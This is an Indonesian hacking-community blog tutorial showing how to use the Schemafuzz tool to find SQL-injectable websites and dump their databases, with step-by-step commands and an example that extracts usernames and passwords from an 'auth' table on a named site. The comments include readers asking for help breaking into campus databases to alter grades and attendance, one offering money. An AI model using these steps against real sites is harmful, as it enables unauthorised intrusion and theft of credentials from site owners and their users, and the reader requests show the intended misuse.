Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Database Dengan Schemafuzzy

22 August 2010
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner



Udah pada tau khaan Schemafuzz apaan? klo belum, schemafuzz adalah tools yg di buat oleh Sauron dari darkc0de. Tools ini berfungsi utk SQL injection dan di buat menggunakan bhs Python. Oke, langsung aja…

Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckckc… windos… windos… repot emang). Utk linux, langsung pake aja… ^^

NOTE: UTK MEMPERBESAR GAMBAR, KLIK KANAN LALU PILIH “VIEW IMAGE”

1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ << Singel quote (’) di akhir url. Nah, apabila muncul pesan error “MySQL error syntax blablabla…” berarti web tsb vul terhadap SQL injection. Paham? oke, lanjut…

2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u

Nanti akan muncul seperti ini:

disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..

3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.

setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,

4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase

hasil nya akan terlihat seperti ini,

digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)

5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass

Yang di block adalah username dan password ^^

Selesai… gunakan tools ini dng bijak yaa ^^

Jangan lupa baca juga artikel sebelumnya di: http://www.binushacker.net/sql-injection-dengan-schemafuzzy.html

Souce: Alzea Arafat

Tags: ,

BINUS HACKER Binus Hacker Chat and Forum

Komentar

18 Komentar Untuk “Hacking Database Dengan Schemafuzzy
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. g4pt3k pada 22 August 2010 10:18 am

    ijin sedot ilmu gan

  2. sky pada 24 August 2010 10:34 am

    Cari dlu web yg vul terhadap SQL injection –> maaf kalo web site tsb tidak vul thd sql injection ..apa yang harus dilakukan gan

    trims atas infonya or email ke just_onez80@yahoo.com

  3. k3y_b04rd pada 1 September 2010 7:04 pm

    tessstt doLo gan….

  4. sandy pada 6 September 2010 8:09 pm

    izin copy ahh gan

  5. Breakfast66 pada 16 September 2010 10:59 pm

    langsung ke TKP gan…..thanx atas infonya,,,,

  6. Boi pada 28 September 2010 1:17 am

    sorry kurang jelas kali tuh….. cari jumlah kolum dan number itu dmna..
    lewat mna

  7. jones pada 2 October 2010 12:16 am

    wew aq iging di ajarin dunk

  8. zon pada 2 October 2010 4:01 am

    ijin copy gan……

  9. raina pada 31 October 2010 1:10 am

    kk,, minta cara hack shadow defender dong…

    thank

  10. doni pada 12 December 2010 9:45 pm

    mantap…

  11. nanda pada 13 December 2010 12:32 pm

    buat database campus bisa gx gan gua mau nukar nilai gua gan,,, nama campus gua upi yptk padang,,,, pasti tau kan gan,,,, so,,, sama2 campus komputer

  12. tam core pada 20 December 2010 5:56 am

    kadang ane bingung mengapa orang-orang gemar merusak bukan membangun kadang orang2 yang bisa merusak belom tentu bisa membangun sedangkan orang yang bisa membangun hanya butuh 2mint untuk merusak sebuah system … by : tam core indo cru

  13. tam core pada 20 December 2010 5:56 am

    kadang ane bingung mengapa orang-orang gemar merusak bukan membangun kadang orang2 yang bisa merusak belom tentu bisa membangun sedangkan orang yang bisa membangun hanya butuh 2mint untuk merusak sebuah system … by : tam core indo

  14. tutorial pada 9 January 2011 7:19 pm

    ada cara lain yang lebih simple gak ya

  15. udhix pada 17 February 2011 11:41 pm

    gan..
    s hack database stikom bali gax..
    klo bs sy byr dech agan..
    1 jt buat yg bs hack database stikom bali…
    aq pngen ngrbah kehadiran kuliah alna..
    klo bs PM k cudhix@yahoo.com
    thax

  16. Andhika Nugraha pada 6 March 2011 10:04 pm

    mantebbbb gan…..meskipun belum dicoba pasti bisalah….oh..ya….bagi scrib Backtrack 4 R2 Dund kk…sekalian scrib JOHN THE RIPPERS…
    thank’s

  17. akira pada 14 March 2011 5:39 am

    izin sedot gan mantab..

  18. Crash Override pada 23 March 2011 5:21 am

    gw mw nNyaq ne,,,,, interpreter python t paan y??? he,,, sejenis program ato apa,,,,
    tolong d bantu yaaaq,,,

Silahkan Berikan Tanggapan Anda...